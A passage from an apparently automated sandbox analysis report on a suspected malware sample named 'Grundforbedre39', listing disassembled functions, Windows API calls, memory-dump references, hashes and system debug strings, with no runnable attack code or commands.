                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrlen
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 2709904686-3370423016
                                                                                      • Opcode ID: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
                                                                                      • Instruction ID: 6345b2d933a2ce4686671ca67b85a4373090522c5e7ae7861229ca93a50cc92f
                                                                                      • Opcode Fuzzy Hash: e45900919dc7b28d9a36bacb3120ea694efe9c6a74e904a90cb467e5f79bac44
                                                                                      • Instruction Fuzzy Hash: 95D05EB2521A309BC312AB08DC4199F63ACEF223057468426F441A61A0D3785C808AB9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(?,?), ref: 1000116A
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                      • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                      • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                      • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405B54 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B7C
                                                                                      • CharNextA.USER32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B8D
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                                                      • Instruction ID: 09ddfbf6a96cc3af2c4d2f748c9cef087a74b3384d996a5f3154f8737d8de66f
                                                                                      • Opcode Fuzzy Hash: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                                                      • Instruction Fuzzy Hash: 86F0C231904514EFC7129FA5CC00D9FBBB8EF06350B2540A5E800F7351D634FE019BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:0%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:23.6%
                                                                                      Total number of Nodes:110
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 39105 3553ff50 235 API calls 39107 3554a350 187 API calls 39110 3550a740 216 API calls 39141 35513640 173 API calls 39013 3552e547 184 API calls 39014 35548d4f 195 API calls 39113 3550bf70 GetPEB LdrInitializeThunk 39015 35515570 211 API calls 39114 35511f70 16 API calls 39115 3553af72 18 API calls 39142 3554ce70 16 API calls 39059 35516074 179 API calls 39060 35510c79 182 API calls 39061 35518c79 6 API calls 39116 3558e372 174 API calls 39144 355be670 RtlDebugPrintTimes GetPEB 39117 355c8770 169 API calls 39062 35507060 RtlDebugPrintTimes 39063 3550dc60 173 API calls 39145 3550b260 185 API calls 39064 35513c60 11 API calls 39147 35514660 12 API calls 39065 3554dc14 179 API calls 39150 35509610 179 API calls 39066 35512410 172 API calls 39067 35542c10 176 API calls 39152 35513e14 174 API calls 39068 3552dc1a 173 API calls 39154 3559b214 172 API calls 39156 35506e00 RtlDebugPrintTimes RtlDebugPrintTimes 39157 35516e00 12 API calls 39158 355a3608 249 API calls 39159 3553d600 190 API calls 39022 35540100 170 API calls 39070 35518009 168 API calls 39072 3550ec0b 183 API calls 39073 3550640d 191 API calls 39074 355cc03d 170 API calls 39162 35512e32 180 API calls 39163 35546e30 RtlDebugPrintTimes GetPEB GetPEB 39025 3554dd3e 204 API calls 39076 35566039 6 API calls 39077 3550b420 8 API calls 39164 3550b620 GetPEB RtlDebugPrintTimes GetPEB 39027 35541527 172 API calls 39078 35512022 14 API calls 39122 35532320 171 API calls 39028 35548520 GetPEB GetPEB RtlDebugPrintTimes 39123 35548322 281 API calls 39030 35549d2c 195 API calls 39167 355d8e26 11 API calls 39032 3550c1d0 168 API calls 39124 35509fd0 169 API calls 39079 35511cd0 170 API calls 39033 35529dd0 176 API calls 39080 355470d0 171 API calls 39081 3554b0dd 170 API calls 39082 35538cdf 169 API calls 39034 355081c0 GetPEB 39083 3550b0c0 188 API calls 39084 35549cc4 15 API calls 39125 3550e3c0 206 API calls 39126 3550bfc0 GetPEB GetPEB GetPEB GetPEB 39127 35591fc9 216 API calls 39035 35511dc0 RtlDebugPrintTimes GetPEB GetPEB GetPEB GetPEB 39170 35513ec0 GetPEB GetPEB GetPEB RtlDebugPrintTimes 39036 355251c0 176 API calls 39085 35546cc0 175 API calls 39086 3559a4c1 LdrInitializeThunk LdrInitializeThunk 39088 35514cca 10 API calls 39090 3553ecf3 191 API calls 39038 355171f0 243 API calls 39091 3553acf0 10 API calls 39093 3554a4f0 172 API calls 39172 355462f0 190 API calls 39094 355d00f5 28 API calls 39175 355202f9 175 API calls 39039 355ea1f0 8 API calls 39176 355072e0 168 API calls 39178 355156e0 202 API calls 39179 355d02ec 10 API calls 39041 3554a5e7 170 API calls 39180 355366e0 222 API calls 39098 355eaceb RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 39182 355476ed 174 API calls 39043 35516d91 GetPEB GetPEB GetPEB 39100 3550c090 180 API calls 39184 3550a290 255 API calls 39186 35517290 16 API calls 39044 355d959f 7 API calls 39187 3552d690 GetPEB RtlDebugPrintTimes RtlDebugPrintTimes 39188 35536691 180 API calls 39101 3554b490 202 API calls 39133 35549790 211 API calls 39011 35552b90 LdrInitializeThunk 39046 35508196 GetPEB GetPEB 39134 35593f9f GetPEB RtlDebugPrintTimes 39135 35511380 51 API calls 39048 35549580 204 API calls 39102 35507c85 175 API calls 39050 3550918a 172 API calls 39051 3550cd8a 171 API calls 39191 3554b28a LdrInitializeThunk 39192 355082b0 170 API calls 39052 355e15ba 172 API calls 39136 35548fbc 188 API calls 39055 35507da0 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 39104 355100a0 292 API calls 39193 355106a0 179 API calls 39138 355dd7a7 8 API calls

                                                                                      Executed Functions

                                                                                      Function 355534E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2 355534e0-355534ec LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 3388e0b4b40acff0bd8fd618d5a721d823f9bdfdf41d330472cdc4024e33f085
                                                                                      • Instruction ID: 995c9f58472cb396645b0e5439d5db9e56c2899c4d28525d040878e4163565d9
                                                                                      • Opcode Fuzzy Hash: 3388e0b4b40acff0bd8fd618d5a721d823f9bdfdf41d330472cdc4024e33f085
                                                                                      • Instruction Fuzzy Hash: 5C90023160514402D54061588624706109547D0209FA1DC56A0414528DCBA5995975A3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35552D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1 35552d10-35552d1c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 228a6f72688b29f1bdc204fe2adb28bc7e1b4fdd03cfb57e800ea199a9dd6a4e
                                                                                      • Instruction ID: 84db4b3cc4201540db602fd247e17d31fc8554f1b669f054a493dc5542ec0037
                                                                                      • Opcode Fuzzy Hash: 228a6f72688b29f1bdc204fe2adb28bc7e1b4fdd03cfb57e800ea199a9dd6a4e
                                                                                      • Instruction Fuzzy Hash: CC90023120104413D55161588614707009947D0249FD1DC57A0414518DDA66995AB122
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35552B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 35552b90-35552b9c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 8ba9a2579fdd5c16073fad019b32d3f0398baf8456ff1dad97443d30192ca8c8
                                                                                      • Instruction ID: cb9d588e263f810f07decb79e3ae4d8b78db437e3a863b10bc1d73576ea204c6
                                                                                      • Opcode Fuzzy Hash: 8ba9a2579fdd5c16073fad019b32d3f0398baf8456ff1dad97443d30192ca8c8
                                                                                      • Instruction Fuzzy Hash: A99002312010C802D5506158C51474A009547D0309F95DC56A4414618DCAA598997122
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 35548540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 377 35548540-355485a1 378 355485a7-355485b8 377->378 379 355850a2-355850a8 377->379 379->378 380 355850ae-355850bb GetPEB 379->380 380->378 381 355850c1-355850c4 380->381 382 355850e1-35585107 call 35552c00 381->382 383 355850c6-355850d0 381->383 382->378 388 3558510d-35585111 382->388 383->378 384 355850d6-355850df 383->384 386 35585138-3558514c call 355153c0 384->386 392 35585152-3558515e 386->392 388->378 391 35585117-3558512c call 35552c00 388->391 391->378 400 35585132 391->400 394 35585164-35585178 392->394 395 35585367-35585373 call 35585378 392->395 398 3558517a 394->398 399 35585196-3558520c 394->399 395->378 402 3558517c-35585183 398->402 405 3558520e-35585240 call 3550fcf0 399->405 406 35585245-35585248 399->406 400->386 402->399 404 35585185-35585187 402->404 407 35585189-3558518c 404->407 408 3558518e-35585190 404->408 419 35585358-3558535d call 3559a130 405->419 410 3558524e-3558529f 406->410 411 3558531f-35585322 406->411 407->402 408->399 412 35585360-35585362 408->412 416 355852d9-3558531d call 3550fcf0 * 2 410->416 417 355852a1-355852d7 call 3550fcf0 410->417 411->412 413 35585324-35585353 call 3550fcf0 411->413 412->392 413->419 416->419 417->419 419->412
                                                                                      Strings
                                                                                      • double initialized or corrupted critical section, xrefs: 35585313
                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 3558534E
                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 355852D9
                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 35585215, 355852A1, 35585324
                                                                                      • Critical section debug info address, xrefs: 3558522A, 35585339
                                                                                      • corrupted critical section, xrefs: 355852CD
                                                                                      • Critical section address, xrefs: 35585230, 355852C7, 3558533F
                                                                                      • undeleted critical section in freed memory, xrefs: 35585236
                                                                                      • Critical section address., xrefs: 3558530D
                                                                                      • Thread identifier, xrefs: 35585345
                                                                                      • Invalid debug info address of this critical section, xrefs: 355852C1
                                                                                      • Address of the debug info found in the active list., xrefs: 355852B9, 35585305
                                                                                      • 8, xrefs: 355850EE
                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 355852ED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                      • API String ID: 0-2368682639
                                                                                      • Opcode ID: 66434d9a8f6353efb4f07bdda773fed0853b8daa9a55ad287882f32e3682f868
                                                                                      • Instruction ID: a03a0b5be7e0647d0c837a9b7925aa8580be7368080419c2f0fd37b80ac33653
                                                                                      • Opcode Fuzzy Hash: 66434d9a8f6353efb4f07bdda773fed0853b8daa9a55ad287882f32e3682f868
                                                                                      • Instruction Fuzzy Hash: F78158B1A01358BFEB14CF98C840B9EBBB5BB48710F614199E945AB240DB76B945CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355BF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1221 355bf0a5-355bf0c7 call 35567be4 1224 355bf0c9-355bf0de RtlDebugPrintTimes 1221->1224 1225 355bf0e3-355bf0fb call 35507662 1221->1225 1229 355bf3e7-355bf3f6 1224->1229 1230 355bf3d2 1225->1230 1231 355bf101-355bf11c 1225->1231 1232 355bf3d5-355bf3e4 call 355bf3f9 1230->1232 1233 355bf11e 1231->1233 1234 355bf125-355bf137 1231->1234 1232->1229 1233->1234 1236 355bf139-355bf13b 1234->1236 1237 355bf13c-355bf144 1234->1237 1236->1237 1239 355bf14a-355bf14d 1237->1239 1240 355bf350-355bf359 GetPEB 1237->1240 1239->1240 1243 355bf153-355bf156 1239->1243 1241 355bf35b-355bf376 GetPEB call 3550b910 1240->1241 1242 355bf378-355bf37d call 3550b910 1240->1242 1251 355bf382-355bf396 call 3550b910 1241->1251 1242->1251 1246 355bf158-355bf170 call 3551fed0 1243->1246 1247 355bf173-355bf196 call 355c0835 call 35525d90 call 355c0d24 1243->1247 1246->1247 1247->1232 1260 355bf19c-355bf1a3 1247->1260 1251->1230 1261 355bf1ae-355bf1b6 1260->1261 1262 355bf1a5-355bf1ac 1260->1262 1263 355bf1b8-355bf1c8 1261->1263 1264 355bf1d4-355bf1d8 1261->1264 1262->1261 1263->1264 1267 355bf1ca-355bf1cf call 355cd646 1263->1267 1265 355bf1da-355bf1ed call 35543ae9 1264->1265 1266 355bf208-355bf20e 1264->1266 1274 355bf1ff 1265->1274 1275 355bf1ef-355bf1fd call 3553fdb9 1265->1275 1269 355bf211-355bf21b 1266->1269 1267->1264 1272 355bf22f-355bf236 1269->1272 1273 355bf21d-355bf22d 1269->1273 1276 355bf238-355bf23c call 355c0835 1272->1276 1277 355bf241-355bf250 GetPEB 1272->1277 1273->1272 1279 355bf202-355bf206 1274->1279 1275->1279 1276->1277 1281 355bf2be-355bf2c9 1277->1281 1282 355bf252-355bf255 1277->1282 1279->1269 1281->1232 1286 355bf2cf-355bf2d5 1281->1286 1283 355bf257-355bf272 GetPEB call 3550b910 1282->1283 1284 355bf274-355bf279 call 3550b910 1282->1284 1291 355bf27e-355bf292 call 3550b910 1283->1291 1284->1291 1286->1232 1289 355bf2db-355bf2e2 1286->1289 1289->1232 1292 355bf2e8-355bf2f3 1289->1292 1300 355bf295-355bf29f GetPEB 1291->1300 1292->1232 1294 355bf2f9-355bf302 GetPEB 1292->1294 1296 355bf321-355bf326 call 3550b910 1294->1296 1297 355bf304-355bf31f GetPEB call 3550b910 1294->1297 1302 355bf32b-355bf34b call 355b823a call 3550b910 1296->1302 1297->1302 1300->1232 1303 355bf2a5-355bf2b9 1300->1303 1302->1300 1303->1232
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                      • API String ID: 3446177414-1745908468
                                                                                      • Opcode ID: 4d8725b4288761d295a8a5314e75c5ccf3ca37ec350ecbcc85b589afcf9cfd73
                                                                                      • Instruction ID: 80f19a1839f152f91639b06e732060b3ffbac1593c8cd33fa5ed6d14b3bbe1bc
                                                                                      • Opcode Fuzzy Hash: 4d8725b4288761d295a8a5314e75c5ccf3ca37ec350ecbcc85b589afcf9cfd73
                                                                                      • Instruction Fuzzy Hash: 9791ED39A04645AFDF01CFE8C444AADBBF2FF89310F848959E445AB251CBB5A941CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1308 3550640d-3550646c call 35506c11 1311 35506472-3550649e call 3552e8a6 call 35506b45 1308->1311 1312 35569770-35569779 1308->1312 1327 355064a4-355064a6 1311->1327 1328 355697e9-355697f2 call 3553e7e0 1311->1328 1313 355697b3-355697b6 1312->1313 1314 3556977b-3556978d 1312->1314 1318 355697dd 1313->1318 1317 355697a0-355697b0 call 3558e692 1314->1317 1317->1313 1320 35506542-3550654a 1318->1320 1321 355697e3-355697e4 1318->1321 1324 35506550-35506564 call 35554b50 1320->1324 1325 35569827-3556982b call 3550ba80 1320->1325 1321->1320 1335 35569830 1325->1335 1332 355697f7-355697fe 1327->1332 1333 355064ac-355064d8 call 35547df6 call 3552d3e1 call 35506868 1327->1333 1328->1332 1338 35569800 call 3558e692 1332->1338 1339 355697db 1332->1339 1348 35569802-3556980b 1333->1348 1349 355064de-35506526 RtlDebugPrintTimes 1333->1349 1335->1335 1338->1339 1339->1318 1348->1313 1350 3556980d 1348->1350 1349->1320 1353 35506528-3550653c call 35506565 1349->1353 1350->1317 1353->1320 1356 3556980f-35569822 GetPEB call 35523bc0 1353->1356 1356->1320
                                                                                      APIs
                                                                                      • RtlDebugPrintTimes.NTDLL ref: 3550651C
                                                                                        • Part of subcall function 35506565: RtlDebugPrintTimes.NTDLL ref: 35506614
                                                                                        • Part of subcall function 35506565: RtlDebugPrintTimes.NTDLL ref: 3550665F
                                                                                      Strings
                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3556977C
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 355697A0, 355697C9
                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 35569790
                                                                                      • apphelp.dll, xrefs: 35506446
                                                                                      • LdrpInitShimEngine, xrefs: 35569783, 35569796, 355697BF
                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 355697B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-204845295
                                                                                      • Opcode ID: 092300e3199f48949ab57c97794dd4d4e935d94e89502e30bba1bd9f3970793f
                                                                                      • Instruction ID: e6eec8753768fb410c020d5f178c914c40f7377ab954c1a4ee5e8d6f3424f0f8
                                                                                      • Opcode Fuzzy Hash: 092300e3199f48949ab57c97794dd4d4e935d94e89502e30bba1bd9f3970793f
                                                                                      • Instruction Fuzzy Hash: 62519EB1619348AFE314DF24D890EABB7F4FBC4648F800919F995972A0DB31E905CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550D02D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1534 3550d02d-3550d056 1535 3556a5a1 1534->1535 1536 3550d05c-3550d05f 1534->1536 1538 3556a5ab-3556a5b4 call 35552a80 1535->1538 1536->1535 1537 3550d065-3550d0b5 call 35555050 call 35552ab0 1536->1537 1545 3556a514-3556a52e call 355cadd6 1537->1545 1546 3550d0bb-3550d0cc call 3550d736 1537->1546 1547 3556a5b9-3556a5bb 1538->1547 1555 3556a534-3556a537 1545->1555 1556 3550d194-3550d199 1545->1556 1557 3550d0d2-3550d0d5 1546->1557 1558 3556a56f 1546->1558 1550 3556a5c1-3556a5c7 1547->1550 1551 3550d1de-3550d1e6 1547->1551 1550->1551 1554 3556a5cd-3556a5d0 1550->1554 1559 3556a5d2-3556a5e4 GetPEB call 35523bc0 1554->1559 1560 3556a5ef-3556a5f1 1554->1560 1564 3556a559-3556a569 call 35552a80 1555->1564 1565 3556a539-3556a54d call 355cad61 1555->1565 1562 3550d1a4-3550d1a9 1556->1562 1563 3550d19b-3550d19f call 35552a80 1556->1563 1566 3550d1e9-3550d1ec 1557->1566 1567 3550d0db-3550d0e0 1557->1567 1568 3556a579-3556a593 call 355cadd6 1558->1568 1559->1560 1560->1551 1562->1538 1573 3550d1af-3550d1b4 1562->1573 1563->1562 1564->1558 1565->1564 1591 3556a54f-3556a554 1565->1591 1570 3550d1f2-3550d1fc 1566->1570 1571 3550d2c9-3550d2d9 call 3550d9a2 1566->1571 1575 3550d192 1567->1575 1576 3550d0e6-3550d130 call 35555050 call 35552ab0 1567->1576 1568->1556 1595 3556a599-3556a59b 1568->1595 1579 3550d202-3550d25a call 35555050 call 35552ab0 1570->1579 1580 3550d2de-3550d2e0 1570->1580 1571->1556 1581 3550d1b6-3550d1ba call 35552a80 1573->1581 1582 3550d1bf-3550d1c1 1573->1582 1575->1556 1576->1568 1606 3550d136-3550d184 call 35555050 call 35552ab0 1576->1606 1587 3550d25f-3550d261 1579->1587 1580->1587 1581->1582 1582->1547 1593 3550d1c7-3550d1ca 1582->1593 1587->1571 1597 3550d263-3550d2c7 call 35555050 call 35552ab0 1587->1597 1591->1564 1598 3556a556-3556a558 1591->1598 1593->1551 1600 3550d1cc-3550d1d8 call 3550daa8 1593->1600 1595->1535 1597->1571 1613 3550d2e5 1597->1613 1598->1564 1600->1551 1610 3556a5e6-3556a5ea 1600->1610 1606->1571 1616 3550d18a-3550d190 1606->1616 1610->1560 1613->1545 1616->1556 1616->1575
                                                                                      Strings
                                                                                      • @, xrefs: 3550D24F
                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 3550D136
                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3550D202
                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3550D0E6
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3550D263
                                                                                      • @, xrefs: 3550D09D
                                                                                      • h.S5, xrefs: 3556A5D2
                                                                                      • @, xrefs: 3550D2B3
                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3550D06F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
